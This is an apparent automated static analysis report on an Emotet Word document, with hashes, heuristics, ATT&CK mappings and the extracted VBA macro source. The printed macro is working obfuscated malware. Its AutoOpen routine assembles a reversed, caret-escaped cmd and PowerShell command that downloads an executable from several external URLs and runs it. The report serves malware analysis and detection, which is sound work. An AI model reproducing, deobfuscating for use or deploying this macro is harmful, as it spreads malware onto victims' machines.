Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 30a28c8127437566…

MALICIOUS

Office (OLE)

71.8 KB Created: 2018-09-13 22:04:00 Authoring application: Microsoft Office Word First seen: 2019-06-27
MD5: a61e59d997a29ec013d393b7a719dbda SHA-1: fa2229ef95b9e45e881ac27004c2a90f6c6e0947 SHA-256: 30a28c8127437566f7452c9b8f1350e61a7d881c611b99399dcc324370a71b3b
142 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The file contains a critical ClamAV detection for Emotet, along with medium-severity heuristics indicating the presence of legacy and standard VBA macros, including an AutoOpen macro. The AutoOpen subroutine in the VBA script attempts to execute a command-line payload using 'cmd.exe', which is obfuscated but appears to be designed to download and execute a second-stage payload. The ClamAV signature specifically names Emotet, supporting this family attribution.

Heuristics 5

  • ClamAV: Doc.Downloader.Emotet-6884106-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6884106-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4231 bytes
SHA-256: 4e93c9b3d50dfbffa52958a20c2f0bb26984cf420b07a03da68a78c4d56038dc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "SszqwTK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
   Dim FFQUZc()
ReDim FFQUZc(5)
FFQUZc(0) = 5
FFQUZc(1) = 1
FFQUZc(2) = 22
FFQUZc(3) = 1220
FFQUZc(4) = 41

   Dim mSHYrf()
ReDim mSHYrf(5)
mSHYrf(0) = 733
mSHYrf(1) = 75
mSHYrf(2) = 67415281
mSHYrf(3) = 25
mSHYrf(4) = 1579

   Dim fskVp()
ReDim fskVp(2)
fskVp(0) = 1244
fskVp(1) = 591

   Dim jTroY()
ReDim jTroY(5)
jTroY(0) = 13
jTroY(1) = 27
jTroY(2) = 8128
jTroY(3) = 119003862
jTroY(4) = 4349

   Dim MPaKZ()
ReDim MPaKZ(4)
MPaKZ(0) = 379641608
MPaKZ(1) = 46911394
MPaKZ(2) = 38
MPaKZ(3) = 654

Shell@ rovZMtIkZJb + YrOoGfHklwYKir + NjDswvUBmiEEzR, Format(0)
   Dim YXIwWR()
ReDim YXIwWR(5)
YXIwWR(0) = 30
YXIwWR(1) = 95
YXIwWR(2) = 5
YXIwWR(3) = 302634732
YXIwWR(4) = 7

   Dim NivzZ()
ReDim NivzZ(2)
NivzZ(0) = 90
NivzZ(1) = 1

End Sub



Attribute VB_Name = "VHbwtETzcXNCY"
Function rovZMtIkZJb()

On _
Error _
Resume _
Next
Dim FqHTRA()
ReDim FqHTRA(5)
FqHTRA(0) = 49
FqHTRA(1) = 4997
FqHTRA(2) = 96534893
FqHTRA(3) = 86
FqHTRA(4) = 8583

   Dim tsTJGE()
ReDim tsTJGE(4)
tsTJGE(0) = 556
tsTJGE(1) = 4
tsTJGE(2) = 1
tsTJGE(3) = 388606671

   Dim wNpfu()
ReDim wNpfu(4)
wNpfu(0) = 68
wNpfu(1) = 3087
wNpfu(2) = 3
wNpfu(3) = 4

baBkpb = Format(Chr(14 + 7 + 8 + 8 + 62)) + "md /V:/" + Format(Chr(10 + 5 + 5 + 5 + 42)) + Format(Chr(4 + 2 + 2 + 2 + 24)) + "s" + "^e^t ^y^k=^  ^  " + "           ^ ^ }^}{h" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "ta" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "^" + "}^;^k^a^er^b;^i^b^Q^$ m" + "etI-^e^k^ovn^I;" + ")i^b^Q$ ,rvv$(e^li^F" + "^d^ao^lnw^o^D^.M^w^H${^yr^" + "t^{)uB^w$ n^i^ rvv^$(^h" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "ae" + "r^o^f;^'ex^e.'+RVE"
Dim mwcjF()
ReDim mwcjF(5)
mwcjF(0) = 9067
mwcjF(1) = 23657316
mwcjF(2) = 6
mwcjF(3) = 6
mwcjF(4) = 21

   Dim zEIMY()
ReDim zEIMY(2)
zEIMY(0) = 6279
zEIMY(1) = 471557024

   Dim dvpCY()
ReDim dvpCY(3)
dvpCY(0) = 192
dvpCY(1) = 351
dvpCY(2) = 334177786

mwOfuLCt = "$^+'^\'" + "^+" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "il^bup^:vne$=i^b^Q^$;^'^5" + "9^6^' = RV^E^$^;)^'@'(ti^" + "l^p^S^.^" + "'s1^tGSL^7r" + "^9j/^ti^" + ".^iz^i^t^a^m^a//^:^p^tth@^m^AW" + "^QuG^f/" + "mo" + Format(Chr(14 + 7 + 8 + 8 + 62)) + ".n^" + "wote^pa" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "^gnir^o^olf^et" + "^an^im^a^l//:^pt^t^h@hQu4U^k" + "^OQ/^e^d^." + "^ten^e^s^o^o^g//:^ptt^h"
Dim iCqkYf()
ReDim iCqkYf(2)
iCqkYf(0) = 548
iCqkYf(1) = 4

   Dim Wzpfz()
ReDim Wzpfz(5)
Wzpfz(0) = 80
Wzpfz(1) = 167892834
Wzpfz(2) = 9035
Wzpfz(3) = 8
Wzpfz(4) = 2

   Dim YhODj()
ReDim YhODj(5)
YhODj(0) = 797
YhODj(1) = 9
YhODj(2) = 798
YhODj(3) = 86622295
YhODj(4) = 2949

kNSOMtOjXo = "@^EqFQb^ZYr^w^Y/^mo" + Format(Chr(14 + 7 + 8 + 8 + 62)) + ".s^m^ets^ys^-^fe^i" + "l^e^b//^:^" + "p^tth@v^mdup^mLR^SF/o^fn^i^" + ".^gno^s" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "^u^htnei^k." + "zra^ts^p" + "o^pk//" + "^:^p^tt^h'^=u^B^w$^;tnei^l" + Format(Chr(10 + 5 + 5 + 5 + 42)) + "^be" + "^W^.teN^" + " ^t" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "^ej^b^o-^wen=^MwH" + "^$^ l^l^e^h^s" + "re^w^o^p&&^f^o" + "r /^L %^0 ^i"
Dim hTToi()
ReDim hTToi(3)
hTToi(0) = 228
hTToi(1) = 801
hTToi(2) = 8569

   Dim tMopO()
ReDim tMopO(4)
tMopO(0) = 52
tMopO(1) = 101626129
tMopO(2) = 223
tMopO(3) = 462115113

FjOdQTYubXn = "n (3^9^3^,-1^,0)^do ^set ^" + "s^Q" + Format(Chr(10 + 5 + 5 + 5 + 42)) + "P=!^s^Q" + Format(Chr(10 + 5 + 5 + 5 + 42)) + "P!!" + "^y^k:~%^0" + ",1!&&^i^f %^0 ^ls^s ^1 " + Format(Chr(14 + 7 + 8 + 8 + 62)) + "a" + "^l^l %^s^Q" + Format(Chr(10 + 5 + 5 + 5 + 42)) + "P:^*^sQ" + Format(Chr(10 + 5 + 5 + 5 + 42)) + "^P" + "^!^=%" + Format(Chr(4 + 2 + 2 + 2 + 24)) + ""
rovZMtIkZJb = baBkpb + mwOfuLCt + kNSOMtOjXo + FjOdQTYubXn
   Dim XojQV()
ReDim XojQV(3)
XojQV(0) = 35055573
XojQV(
... (truncated)